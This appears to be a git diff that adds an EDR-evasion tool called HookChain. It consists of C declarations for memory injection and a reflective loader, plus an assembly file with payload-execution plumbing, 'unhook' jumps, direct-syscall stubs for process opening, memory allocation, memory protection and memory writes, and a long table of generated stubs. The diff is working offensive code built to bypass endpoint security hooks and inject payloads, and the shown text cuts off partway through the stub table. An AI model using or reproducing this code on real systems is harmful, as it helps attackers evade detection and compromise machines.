+DWORD InitSyscallInfo(PSYSCALL_INFO pSyscallInfo, PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, DWORD64 dwHash);
+ULONG InjectMemory(HANDLE ProcessHandle, PVOID DestinationAddress, ULONG NumberOfBytesToWrite);
+PVOID GetReflectiveLoader(PVOID pModuleBase);
+PVOID RtlAllocateHeapStub(_In_ PVOID HeapHandle, _In_ ULONG Flags, _In_ SIZE_T Size);
+static PVOID pRtlAllocateHeap;
+static PVOID pUn;
+#if _WIN64
+#define NtCurrentTeb() ((PTEB)__readgsqword(0x30))
+#define NtCurrentTeb() ((PTEB)__readfsdword(0x16))
+#define NtCurrentPeb() (NtCurrentTeb()->ProcessEnvironmentBlock)
+#define RtlProcessHeap() (NtCurrentPeb()->ProcessHeap)
+#define Local() ((HANDLE)-1)
diff --git a/HookChain/HookChain/hookchain.asm b/HookChain/HookChain/hookchain.asm
new file mode 100644
index 0000000..adff7de
--- /dev/null
+++ b/HookChain/HookChain/hookchain.asm
@@ -0,0 +1,4399 @@
+ qTableAddr QWORD 0h
+ qListEntrySize QWORD 30h
+ qStubEntrySize QWORD 14h
+ qUnhookAddr QWORD 0h
+ qUnhookAddr2 QWORD 0h
+ qPayloadAddr QWORD 0h
+ qPayloadSize QWORD 0h
+ qDebug QWORD 0h
+ qIdx0 QWORD 0h
+ qIdx1 QWORD 0h
+ qIdx2 QWORD 0h
+ qIdx3 QWORD 0h
+ qIdx4 QWORD 0h
+ qIdx5 QWORD 0h
+ qIdx6 QWORD 0h
+;EXTERN PayloadPointer: PROC
+;EXTERN payload: BYTE
+ Stop PROC
+ int 3
+ ret
+ Stop ENDP
+ GetZeroAddr PROC
+ jmp short st1
+ st2:
+ pop rax
+ ret
+ st1:
+ call st2
+ GetZeroAddr ENDP
+ RetZero PROC
+ xor rax, rax
+ ret
+ RetZero ENDP
+ SetDebug PROC
+ mov qDebug, rcx
+ xor rax, rax
+ ret
+ SetDebug ENDP
+ SetAddr PROC
+ mov qUnhookAddr, rcx
+ xor rax, rax
+ ret
+ SetAddr ENDP
+ ExecAddr PROC
+ mov rax, qUnhookAddr
+ test rax, rax
+ je e1
+ jmp rax
+ e1:
+ ret
+ ExecAddr ENDP
+ SetAddr2 PROC
+ mov qUnhookAddr2, rcx
+ xor rax, rax
+ ret
+ SetAddr2 ENDP
+ ExecAddr2 PROC
+ mov rax, qUnhookAddr2
+ test rax, rax
+ je e1
+ jmp rax
+ e1:
+ ret
+ ExecAddr2 ENDP
+ SetPayloadData PROC
+ mov qPayloadAddr, rcx
+ mov qPayloadSize, rdx
+ xor rax, rax
+ ret
+ SetPayloadData ENDP
+ RtlCompareStringStub PROC
+ mov rax, 0h
+ ret
+ RtlCompareStringStub ENDP
+ RtlEqualStringStub PROC
+ mov rax, 1h
+ ret
+ RtlEqualStringStub ENDP
+ Caller PROC
+ mov rax, [rsp]
+ ret
+ Caller ENDP
+ Execute PROC
+ push rbp
+ mov rbp, rsp
+ mov rax, rcx
+ sub rsp, 20h
+ xor rdx, rdx
+ dec rdx
+ shl rdx, 4
+ and rsp, rdx
+ xor rdx, rdx
+ mov rcx, rdx
+ mov r8, rdx
+ mov r9, rdx
+ mov [rsp], rdx
+ mov [rsp + 08h], rdx
+ mov [rsp + 10h], rdx
+ mov [rsp + 18h], rdx
+ call rax
+ mov rsp, rbp
+ pop rbp
+ ret
+ Execute ENDP
+ SetIdx PROC
+ mov rax, 0h
+ lea r12, qIdx0
+ mov [r12 + rcx * 8], rdx
+ mov rax, 1h
+ ret
+ SetIdx ENDP
+ SetTableAddr PROC
+ xor rax, rax
+ mov qTableAddr, 0h
+ mov qTableAddr, rcx
+ call GetAddr
+ xor r11, r11
+ mov r14, rax
+ mov rcx, 200h
+ L1:
+ mov rax, r11
+ mov rdx, qStubEntrySize
+ mul rdx
+ push rcx
+ mov rcx, r11
+ lea rdx, [r14 + rax]
+ call SetIdxProc
+ pop rcx
+ inc r11
+ loop L1
+ mov rax, 1h
+ ret
+ SetTableAddr ENDP
+ SetIdxProc PROC
+ mov rax, rcx
+ mov r12, rdx
+ mov rdx, qListEntrySize
+ mul rdx
+ mov rdx, r12
+ mov r12, qTableAddr
+ lea rax, [r12 + rax]
+ mov [rax + 18h], rdx
+ ret
+ SetIdxProc ENDP
+ SyscallExec PROC
+ cmp qDebug, 01h ; Check if is DEBUG enabled
+ jne exec
+ ; Code responsible to do a callback to function PrintCall
+ push rsi
+ mov rsi, [rsp + 08h]
+ push rbp
+ push rax
+ push rcx
+ push rdx
+ push r8
+ push r9
+ mov rbp, rsp
+ mov rcx, rax
+ mov rdx, rsi
+ mov r8, rsp
+ sub rsp, 20h
+ call PrintCall
+ mov rsp, rbp
+ pop r9
+ pop r8
+ pop rdx
+ pop rcx
+ pop rax
+ pop rbp
+ pop rsi
+ ; finish print
+ exec:
+ sub rsp, 08h ; Address to place syscall addr and use with ret
+ push r12
+ push r9
+ push r8
+ push rdx
+ push rcx
+ push rbp
+ mov rbp, rsp
+ mov r12, rdx
+ mov rdx, qListEntrySize
+ mul rdx
+ mov rdx, r12
+ mov r12, qTableAddr
+ lea rax, [r12 + rax]
+ mov r12, [rax + 10h]
+ mov rax, [rax]
+ mov [rbp + 30h], r12 ; 0x30 = 6 * 8 = 48
+ mov rsp, rbp
+ pop rbp
+ pop rcx
+ pop rdx
+ pop r8
+ pop r9
+ pop r12
+ mov r10, rcx
+ ret ; jmp to the address saved at stack
+ SyscallExec ENDP
+ ; Functions used to the first Bypass
+ NtOpenProcessStub PROC
+ mov rax, qIdx0
+ jmp SyscallExec
+ ret
+ NtOpenProcessStub ENDP
+ NtProtectVirtualMemoryStub PROC
+ mov rax, qIdx1
+ jmp SyscallExec
+ ret
+ NtProtectVirtualMemoryStub ENDP
+ NtReadVirtualMemoryStub PROC
+ mov rax, qIdx2
+ jmp SyscallExec
+ ret
+ NtReadVirtualMemoryStub ENDP
+ NtWriteVirtualMemoryStub PROC
+ mov rax, qIdx3
+ jmp SyscallExec
+ ret
+ NtWriteVirtualMemoryStub ENDP
+ NtAllocateVirtualMemoryStub PROC
+ mov rax, qIdx4
+ jmp SyscallExec
+ ret
+ NtAllocateVirtualMemoryStub ENDP
+ NtDelayExecutionStub PROC
+ mov rax, qIdx5
+ jmp SyscallExec
+ ret
+ NtDelayExecutionStub ENDP
+ NtQueryVirtualMemoryStub PROC
+ mov rax, qIdx6
+ jmp SyscallExec
+ ret
+ NtQueryVirtualMemoryStub ENDP
+ GetData PROC
+ mov r10, rcx
+ mov r11, rdx
+ mov rdx, qListEntrySize
+ mul rdx
+ mov rdx, r12
+ mov r12, qTableAddr
+ lea rax, [r12 + rax]
+ lea r12, [rax + 10h]
+ mov [r10], rax
+ mov [r11], r12
+ mov rax, 1h
+ ret
+ GetData ENDP
+ GetAddr PROC
+ lea rax, OFFSET L1
+ inc rax
+ ret
+ L1:
+ db 90h
+ GetAddr ENDP
+ ; Jmp functions
+ Fnc0000 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0000h
+ ret
+ nop
+ Fnc0000 ENDP
+ Fnc0001 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0001h
+ ret
+ nop
+ Fnc0001 ENDP
+ Fnc0002 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0002h
+ ret
+ nop
+ Fnc0002 ENDP
+ Fnc0003 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0003h
+ ret
+ nop
+ Fnc0003 ENDP
+ Fnc0004 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0004h
+ ret
+ nop
+ Fnc0004 ENDP
+ Fnc0005 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0005h
+ ret
+ nop
+ Fnc0005 ENDP
+ Fnc0006 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0006h
+ ret
+ nop
+ Fnc0006 ENDP
+ Fnc0007 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0007h
+ ret
+ nop
+ Fnc0007 ENDP
+ Fnc0008 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0008h
+ ret
+ nop
+ Fnc0008 ENDP
+ Fnc0009 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0009h
+ ret
+ nop
+ Fnc0009 ENDP
+ Fnc000A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000ah
+ ret
+ nop
+ Fnc000A ENDP
+ Fnc000B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000bh
+ ret
+ nop
+ Fnc000B ENDP
+ Fnc000C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000ch
+ ret
+ nop
+ Fnc000C ENDP
+ Fnc000D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000dh
+ ret
+ nop
+ Fnc000D ENDP
+ Fnc000E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000eh
+ ret
+ nop
+ Fnc000E ENDP
+ Fnc000F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000fh
+ ret
+ nop
+ Fnc000F ENDP
+ Fnc0010 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0010h
+ ret
+ nop
+ Fnc0010 ENDP
+ Fnc0011 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0011h
+ ret
+ nop
+ Fnc0011 ENDP
+ Fnc0012 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0012h
+ ret
+ nop
+ Fnc0012 ENDP
+ Fnc0013 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0013h
+ ret
+ nop
+ Fnc0013 ENDP
+ Fnc0014 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0014h
+ ret
+ nop
+ Fnc0014 ENDP
+ Fnc0015 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0015h
+ ret
+ nop
+ Fnc0015 ENDP
+ Fnc0016 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0016h
+ ret
+ nop
+ Fnc0016 ENDP
+ Fnc0017 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0017h
+ ret
+ nop
+ Fnc0017 ENDP
+ Fnc0018 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0018h
+ ret
+ nop
+ Fnc0018 ENDP
+ Fnc0019 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0019h
+ ret
+ nop
+ Fnc0019 ENDP
+ Fnc001A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001ah
+ ret
+ nop
+ Fnc001A ENDP
+ Fnc001B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001bh
+ ret
+ nop
+ Fnc001B ENDP
+ Fnc001C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001ch
+ ret
+ nop
+ Fnc001C ENDP
+ Fnc001D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001dh
+ ret
+ nop
+ Fnc001D ENDP
+ Fnc001E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001eh
+ ret
+ nop
+ Fnc001E ENDP
+ Fnc001F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001fh
+ ret
+ nop
+ Fnc001F ENDP
+ Fnc0020 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0020h
+ ret
+ nop
+ Fnc0020 ENDP
+ Fnc0021 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0021h
+ ret
+ nop
+ Fnc0021 ENDP
+ Fnc0022 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0022h
+ ret
+ nop
+ Fnc0022 ENDP
+ Fnc0023 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0023h
+ ret
+ nop
+ Fnc0023 ENDP
+ Fnc0024 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0024h
+ ret
+ nop
+ Fnc0024 ENDP
+ Fnc0025 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0025h
+ ret
+ nop
+ Fnc0025 ENDP
+ Fnc0026 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0026h
+ ret
+ nop
+ Fnc0026 ENDP
+ Fnc0027 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0027h
+ ret
+ nop
+ Fnc0027 ENDP
+ Fnc0028 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0028h
+ ret
+ nop
+ Fnc0028 ENDP
+ Fnc0029 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0029h
+ ret
+ nop
+ Fnc0029 ENDP
+ Fnc002A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002ah
+ ret
+ nop
+ Fnc002A ENDP
+ Fnc002B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002bh
+ ret
+ nop
+ Fnc002B ENDP
+ Fnc002C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002ch
+ ret
+ nop
+ Fnc002C ENDP
+ Fnc002D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002dh
+ ret
+ nop
+ Fnc002D ENDP
+ Fnc002E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002eh
+ ret
+ nop
+ Fnc002E ENDP
+ Fnc002F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002fh
+ ret
+ nop
+ Fnc002F ENDP
+ Fnc0030 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0030h
+ ret
+ nop
+ Fnc0030 ENDP
+ Fnc0031 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0031h
+ ret
+ nop
+ Fnc0031 ENDP
+ Fnc0032 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0032h
+ ret
+ nop
+ Fnc0032 ENDP
+ Fnc0033 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0033h
+ ret
+ nop
+ Fnc0033 ENDP
+ Fnc0034 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0034h
+ ret
+ nop
+ Fnc0034 ENDP
+ Fnc0035 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0035h
+ ret
+ nop
+ Fnc0035 ENDP
+ Fnc0036 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0036h
+ ret
+ nop
+ Fnc0036 ENDP
+ Fnc0037 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0037h
+ ret
+ nop
+ Fnc0037 ENDP
+ Fnc0038 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0038h
+ ret
+ nop
+ Fnc0038 ENDP
+ Fnc0039 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0039h
+ ret
+ nop
+ Fnc0039 ENDP
+ Fnc003A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003ah
+ ret
+ nop
+ Fnc003A ENDP
+ Fnc003B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003bh
+ ret
+ nop
+ Fnc003B ENDP
+ Fnc003C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003ch
+ ret
+ nop
+ Fnc003C ENDP
+ Fnc003D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003dh
+ ret
+ nop
+ Fnc003D ENDP
+ Fnc003E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003eh
+ ret
+ nop
+ Fnc003E ENDP
+ Fnc003F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003fh
+ ret
+ nop
+ Fnc003F ENDP
+ Fnc0040 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0040h
+ ret
+ nop
+ Fnc0040 ENDP
+ Fnc0041 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0041h
+ ret
+ nop
+ Fnc0041 ENDP
+ Fnc0042 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0042h
+ ret
+ nop
+ Fnc0042 ENDP
+ Fnc0043 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0043h
+ ret
+ nop
+ Fnc0043 ENDP
+ Fnc0044 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0044h
+ ret
+ nop
+ Fnc0044 ENDP
+ Fnc0045 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0045h
+ ret
+ nop
+ Fnc0045 ENDP
+ Fnc0046 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0046h
+ ret
+ nop
+ Fnc0046 ENDP
+ Fnc0047 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0047h
+ ret
+ nop
+ Fnc0047 ENDP
+ Fnc0048 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0048h
+ ret
+ nop
+ Fnc0048 ENDP
+ Fnc0049 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0049h
+ ret
+ nop
+ Fnc0049 ENDP
+ Fnc004A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004ah
+ ret
+ nop
+ Fnc004A ENDP
+ Fnc004B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004bh
+ ret
+ nop
+ Fnc004B ENDP
+ Fnc004C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004ch
+ ret
+ nop
+ Fnc004C ENDP
+ Fnc004D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004dh
+ ret
+ nop
+ Fnc004D ENDP
+ Fnc004E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004eh
+ ret
+ nop
+ Fnc004E ENDP
+ Fnc004F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 004fh
+ ret
+ nop
+ Fnc004F ENDP
+ Fnc0050 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0050h
+ ret
+ nop
+ Fnc0050 ENDP
+ Fnc0051 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0051h
+ ret
+ nop
+ Fnc0051 ENDP
+ Fnc0052 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0052h
+ ret
+ nop
+ Fnc0052 ENDP
+ Fnc0053 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0053h
+ ret
+ nop
+ Fnc0053 ENDP
+ Fnc0054 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0054h
+ ret
+ nop
+ Fnc0054 ENDP
+ Fnc0055 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0055h
+ ret
+ nop
+ Fnc0055 ENDP
+ Fnc0056 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0056h
+ ret
+ nop
+ Fnc0056 ENDP
+ Fnc0057 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0057h
+ ret
+ nop
+ Fnc0057 ENDP
+ Fnc0058 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0058h
+ ret
+ nop
+ Fnc0058 ENDP
+ Fnc0059 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0059h
+ ret
+ nop
+ Fnc0059 ENDP
+ Fnc005A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005ah
+ ret
+ nop
+ Fnc005A ENDP
+ Fnc005B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005bh
+ ret
+ nop
+ Fnc005B ENDP
+ Fnc005C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005ch
+ ret
+ nop
+ Fnc005C ENDP
+ Fnc005D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005dh
+ ret
+ nop
+ Fnc005D ENDP
+ Fnc005E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005eh
+ ret
+ nop
+ Fnc005E ENDP
+ Fnc005F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 005fh
+ ret
+ nop
+ Fnc005F ENDP
+ Fnc0060 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0060h
+ ret
+ nop
+ Fnc0060 ENDP
+ Fnc0061 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0061h
+ ret
+ nop
+ Fnc0061 ENDP
+ Fnc0062 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0062h
+ ret
+ nop
+ Fnc0062 ENDP
+ Fnc0063 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0063h
+ ret
+ nop
+ Fnc0063 ENDP
+ Fnc0064 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0064h
+ ret
+ nop
+ Fnc0064 ENDP
+ Fnc0065 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0065h
+ ret
+ nop
+ Fnc0065 ENDP
+ Fnc0066 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0066h
+ ret
+ nop
+ Fnc0066 ENDP
+ Fnc0067 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0067h
+ ret
+ nop
+ Fnc0067 ENDP
+ Fnc0068 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0068h
+ ret
+ nop
+ Fnc0068 ENDP
+ Fnc0069 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0069h
+ ret
+ nop
+ Fnc0069 ENDP
+ Fnc006A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006ah
+ ret
+ nop
+ Fnc006A ENDP
+ Fnc006B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006bh
+ ret
+ nop
+ Fnc006B ENDP
+ Fnc006C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006ch
+ ret
+ nop
+ Fnc006C ENDP
+ Fnc006D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006dh
+ ret
+ nop
+ Fnc006D ENDP
+ Fnc006E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006eh
+ ret
+ nop
+ Fnc006E ENDP
+ Fnc006F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 006fh
+ ret
+ nop
+ Fnc006F ENDP
+ Fnc0070 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0070h
+ ret
+ nop
+ Fnc0070 ENDP
+ Fnc0071 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0071h
+ ret
+ nop
+ Fnc0071 ENDP
+ Fnc0072 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0072h
+ ret
+ nop
+ Fnc0072 ENDP
+ Fnc0073 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0073h
+ ret
+ nop
+ Fnc0073 ENDP
+ Fnc0074 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0074h
+ ret
+ nop
+ Fnc0074 ENDP
+ Fnc0075 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0075h
+ ret
+ nop
+ Fnc0075 ENDP
+ Fnc0076 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0076h
+ ret
+ nop
+ Fnc0076 ENDP
+ Fnc0077 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0077h
+ ret
+ nop
+ Fnc0077 ENDP
+ Fnc0078 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0078h
+ ret
+ nop
+ Fnc0078 ENDP
+ Fnc0079 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0079h
+ ret
+ nop
+ Fnc0079 ENDP
+ Fnc007A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007ah
+ ret
+ nop
+ Fnc007A ENDP
+ Fnc007B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007bh
+ ret
+ nop
+ Fnc007B ENDP
+ Fnc007C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007ch
+ ret
+ nop
+ Fnc007C ENDP
+ Fnc007D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007dh
+ ret
+ nop
+ Fnc007D ENDP
+ Fnc007E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007eh
+ ret
+ nop
+ Fnc007E ENDP
+ Fnc007F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 007fh
+ ret
+ nop
+ Fnc007F ENDP
+ Fnc0080 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0080h
+ ret
+ nop
+ Fnc0080 ENDP
+ Fnc0081 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0081h
+ ret
+ nop
+ Fnc0081 ENDP
+ Fnc0082 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0082h
+ ret
+ nop
+ Fnc0082 ENDP
+ Fnc0083 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0083h
+ ret
+ nop
+ Fnc0083 ENDP
+ Fnc0084 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0084h
+ ret
+ nop
+ Fnc0084 ENDP
+ Fnc0085 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0085h
+ ret
+ nop
+ Fnc0085 ENDP
+ Fnc0086 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0086h
+ ret
+ nop
+ Fnc0086 ENDP
+ Fnc0087 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0087h
+ ret
+ nop
+ Fnc0087 ENDP
+ Fnc0088 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0088h
+ ret
+ nop
+ Fnc0088 ENDP
+ Fnc0089 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0089h
+ ret
+ nop
+ Fnc0089 ENDP
+ Fnc008A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008ah
+ ret
+ nop
+ Fnc008A ENDP
+ Fnc008B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008bh
+ ret
+ nop
+ Fnc008B ENDP
+ Fnc008C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008ch
+ ret
+ nop
+ Fnc008C ENDP
+ Fnc008D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008dh
+ ret
+ nop
+ Fnc008D ENDP
+ Fnc008E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008eh
+ ret
+ nop
+ Fnc008E ENDP
+ Fnc008F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 008fh
+ ret
+ nop
+ Fnc008F ENDP
+ Fnc0090 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0090h
+ ret
+ nop
+ Fnc0090 ENDP
+ Fnc0091 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0091h
+ ret
+ nop
+ Fnc0091 ENDP
+ Fnc0092 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0092h
+ ret
+ nop
+ Fnc0092 ENDP
+ Fnc0093 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0093h
+ ret
+ nop
+ Fnc0093 ENDP
+ Fnc0094 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0094h
+ ret
+ nop
+ Fnc0094 ENDP
+ Fnc0095 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0095h
+ ret
+ nop
+ Fnc0095 ENDP
+ Fnc0096 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0096h
+ ret
+ nop
+ Fnc0096 ENDP
+ Fnc0097 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0097h
+ ret
+ nop
+ Fnc0097 ENDP
+ Fnc0098 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0098h
+ ret
+ nop
+ Fnc0098 ENDP
+ Fnc0099 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0099h
+ ret
+ nop
+ Fnc0099 ENDP
+ Fnc009A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009ah
+ ret
+ nop
+ Fnc009A ENDP
+ Fnc009B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009bh
+ ret
+ nop
+ Fnc009B ENDP
+ Fnc009C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009ch
+ ret
+ nop
+ Fnc009C ENDP
+ Fnc009D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009dh
+ ret
+ nop
+ Fnc009D ENDP
+ Fnc009E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009eh
+ ret
+ nop
+ Fnc009E ENDP
+ Fnc009F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 009fh
+ ret
+ nop
+ Fnc009F ENDP
+ Fnc00A0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a0h
+ ret
+ nop
+ Fnc00A0 ENDP
+ Fnc00A1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a1h
+ ret
+ nop
+ Fnc00A1 ENDP
+ Fnc00A2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a2h
+ ret
+ nop
+ Fnc00A2 ENDP
+ Fnc00A3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a3h
+ ret
+ nop
+ Fnc00A3 ENDP
+ Fnc00A4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a4h
+ ret
+ nop
+ Fnc00A4 ENDP
+ Fnc00A5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a5h
+ ret
+ nop
+ Fnc00A5 ENDP
+ Fnc00A6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a6h
+ ret
+ nop
+ Fnc00A6 ENDP
+ Fnc00A7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a7h
+ ret
+ nop
